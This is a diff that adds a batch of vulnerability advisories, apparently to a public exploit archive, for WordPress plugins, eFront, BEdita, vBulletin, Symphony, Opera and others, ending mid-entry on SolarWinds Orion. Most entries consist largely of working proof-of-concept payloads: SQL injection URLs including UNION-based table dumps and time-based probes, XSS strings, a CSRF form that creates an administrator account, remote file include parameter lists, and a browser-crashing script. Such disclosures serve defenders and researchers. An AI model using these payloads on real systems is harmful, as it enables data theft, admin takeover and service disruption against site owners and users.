+[+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip
+
+[+] Description:
+	There are sql injection vulnerabilities in Calculated Fields Form Plugin
+	which could allow the attacker to execute sql queries into database
+
+[+] Vulnerable Code: [Red]
+https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form
+
+[+] POC: 
+
+/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText 
+/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
+/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1 
+/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2  Delete
+
+These queries are execute without any csrf protection, The attacker can use this csrf vulnerability to execute queries in the sql by sending malicious page to the logged in admin
+
+[+] Impact: Attacker can use this vulnerabilities to update admin password
+
+[+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP
+
+[+] @lnxg33k Enta Sa3eed Bahlol?
+
+
diff --git a/platforms/php/webapps/36259.txt b/platforms/php/webapps/36259.txt
new file mode 100755
index 000000000..59437a595
--- /dev/null
+++ b/platforms/php/webapps/36259.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50419/info
+
+eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+eFront 3.6.10 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--
+
+http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/36265.txt b/platforms/php/webapps/36265.txt
new file mode 100755
index 000000000..edfd58b80
--- /dev/null
+++ b/platforms/php/webapps/36265.txt
@@ -0,0 +1,118 @@
+BEdita CMS - XSS & CSRF Vulnerability in Version 3.5.0
+
+----------------------------------------------------------------
+
+Product Information:
+
+Software: BEdita CMS
+Tested Version: 3.5.0, released 19.1.2015
+Vulnerability Type: Cross-Site Scripting (CWE-79) & Cross-Site Request Forgery, CSRF (CWE-352)
+Download link: http://www.bedita.com/download-bedita
+Description: A software to create, manage content and organize it with semantic rules. (copied from http://www.bedita.com/what-is-bedita)
+
+----------------------------------------------------------------
+
+Issues:
+
+1) XSS in newsletter mail group creation page.
+2) CSRF in user creation page.
+
+----------------------------------------------------------------
+
+Vulnerability description:
+
+1) XSS in newsletter mail group creation page
+
+When an authenticated user of BEdita CMS is creating a newsletter mail group, the following POST request is sent to the server:
+
+POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
+Host: 127.0.0.1
+Proxy-Connection: keep-alive
+Content-Length: 523
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Origin: http://127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132
+
+data[MailGroup][id]=&data[MailGroup][group_name]=<script>alert(0)</script>&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user], 
+
+your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user], 
+
+you+have+been+unsubscribed+from "[$title]"
+
+The parameter data[MailGroup][group_name] is vulnerable to XSS.
+
+2) CSRF in user creation page
+
+When an authenticated administrative user of BEdita CMS is creating an user, the following POST request is sent to the server:
+
+POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1
+Host: 127.0.0.1
+Proxy-Connection: keep-alive
+Content-Length: 339
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Origin: http://127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/viewUser
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132
+
+data[User][auth_type]=bedita&data[User][userid]=csrfadmin99&data[User][auth_params][userid]=&pwd=1qazXSW@&data[User][passwd]=1qazXSW@&data[User][realname]=csrfadmin99&data[User][email]=csrfadmin99@admin.com&data[User][valid]=1&groups=&data[groups][administrator]=on
+
+By executing the following Proof-of-Concept, a new user called "csrfadmin99" will be created with the password "1qazXSW@".
+
+<html>
+<body>
+<form action="http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser" method="POST">
+<input type="hidden" name="data[User][auth_type]" value="bedita" />
+<input type="hidden" name="data[User][userid]" value="csrfadmin99" />
+<input type="hidden" name="pwd" value="1qazXSW@" />
+<input type="hidden" name="data[User][passwd]" value="1qazXSW@" />
+<input type="hidden" name="data[User][realname]" value="csrfadmin99" />
+<input type="hidden" name="data[User][email]" value="csrfadmin99@admin.com" />
+<input type="hidden" name="data[User][valid]" value="1" />
+<input type="hidden" name="data[groups][administrator]" value="on" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+----------------------------------------------------------------
+
+Impact:
+
+1) An attacker is able to leverage on the XSS vulnerability to exploit users of BEdita. An example would be to Inject malicious JavaScript code in order to use attacking tools like BeEF.
+2) An attacker is able to create an user account with administrator privilege.
+
+----------------------------------------------------------------
+
+Solution:
+
+Update to the latest version, which is 3.5.1, see https://groups.google.com/forum/?fromgroups#!topic/bedita/SOYrl5C-YRg
+
+----------------------------------------------------------------
+
+Timeline:
+
+Vulnerability found: 11.2.2015
+Vendor informed: 11.2.2015
+Response by vendor: 11.2.2015
+Fix by vendor 19.2.2015
+Public Advisory: 1.3.2015
+
+----------------------------------------------------------------
+
+References:
+https://github.com/bedita/bedita/issues/591
+https://github.com/bedita/bedita/issues/597
+
+----------------------------------------------------------------
+
diff --git a/platforms/php/webapps/36269.txt b/platforms/php/webapps/36269.txt
new file mode 100755
index 000000000..a16ddd911
--- /dev/null
+++ b/platforms/php/webapps/36269.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50426/info
+
+SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SjXjV 2.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
+
+http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5 
\ No newline at end of file
diff --git a/platforms/php/webapps/36270.txt b/platforms/php/webapps/36270.txt
new file mode 100755
index 000000000..e8cfb85e1
--- /dev/null
+++ b/platforms/php/webapps/36270.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50428/info
+
+Plici is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/l1/p48-search.html[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36272.txt b/platforms/php/webapps/36272.txt
new file mode 100755
index 000000000..17cb9eab2
--- /dev/null
+++ b/platforms/php/webapps/36272.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50454/info
+
+Domain Shop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/index.php
+Search Box
+"><script>alert(document.domain)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/36273.txt b/platforms/php/webapps/36273.txt
new file mode 100755
index 000000000..c8f2237da
--- /dev/null
+++ b/platforms/php/webapps/36273.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/50455/info
+
+vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+vBulletin 4.1.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/vB1/api.php?api_script=[RFI]
+http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
+http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
+http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
+http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
+http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
+http://www.example.com/vB1/includes/class_block.php?file=[RFI]
+http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
+http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
+http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
+http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
+http://www.example.com/vB1/vb/vb.php?filename=[RFI]
+http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
+http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
+http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36277.txt b/platforms/php/webapps/36277.txt
new file mode 100755
index 000000000..d4b886eba
--- /dev/null
+++ b/platforms/php/webapps/36277.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50468/info
+
+IBSng is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/IBSng/util/show_multistr.php?str=[xss] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36278.txt b/platforms/php/webapps/36278.txt
new file mode 100755
index 000000000..651e45a1e
--- /dev/null
+++ b/platforms/php/webapps/36278.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/50469/info
+
+eFront is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 
+
+http://example.com/administrator.php?ctg=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&user=admin&op=dashboard
+
+http://example.com/administrator.php?ctg=personal&user='%20stYle=x:expre/**/ssion(alert(9))%20ns='%20&op=dashboard
+
+http://example.com/administrator.php?ctg=calendar&view_calendar=%22%20stYle=x:expre/**/ssion(alert(9))%20ns=%22
+
+http://example.com/index.php?ctg=lesson_info&lessons_ID=2&course='%20stYle='x:expre/**/ssion(alert(9))
\ No newline at end of file
diff --git a/platforms/php/webapps/36280.txt b/platforms/php/webapps/36280.txt
new file mode 100755
index 000000000..855defc92
--- /dev/null
+++ b/platforms/php/webapps/36280.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50470/info
+
+Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Symphony versions prior to 2.2.4 are vulnerable. 
+
+http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/36281.txt b/platforms/php/webapps/36281.txt
new file mode 100755
index 000000000..ac3b4d6f2
--- /dev/null
+++ b/platforms/php/webapps/36281.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50470/info
+
+Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Symphony versions prior to 2.2.4 are vulnerable. 
+
+http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'
\ No newline at end of file
diff --git a/platforms/windows/dos/36260.txt b/platforms/windows/dos/36260.txt
new file mode 100755
index 000000000..2655e6bd9
--- /dev/null
+++ b/platforms/windows/dos/36260.txt
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/50421/info
+
+The Opera Web Browser is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+Opera Web Browser 11.52 is vulnerable; other versions may also be affected. 
+
+<script>alert(/\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script>
diff --git a/platforms/windows/webapps/36262.txt b/platforms/windows/webapps/36262.txt
new file mode 100755
index 000000000..32c727592
--- /dev/null
+++ b/platforms/windows/webapps/36262.txt
@@ -0,0 +1,142 @@
+I found a couple SQL injection vulnerabilities in the core Orion service
+used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
+service provides a consistent configuration and authentication layer across
+the products.
+
+To be exact, the vulnerable applications and versions are:
+
+Network Performance Monitor -- < 11.5
+NetFlow Traffic Analyzer -- < 4.1
+Network Configuration Manager -- < 7.3.2
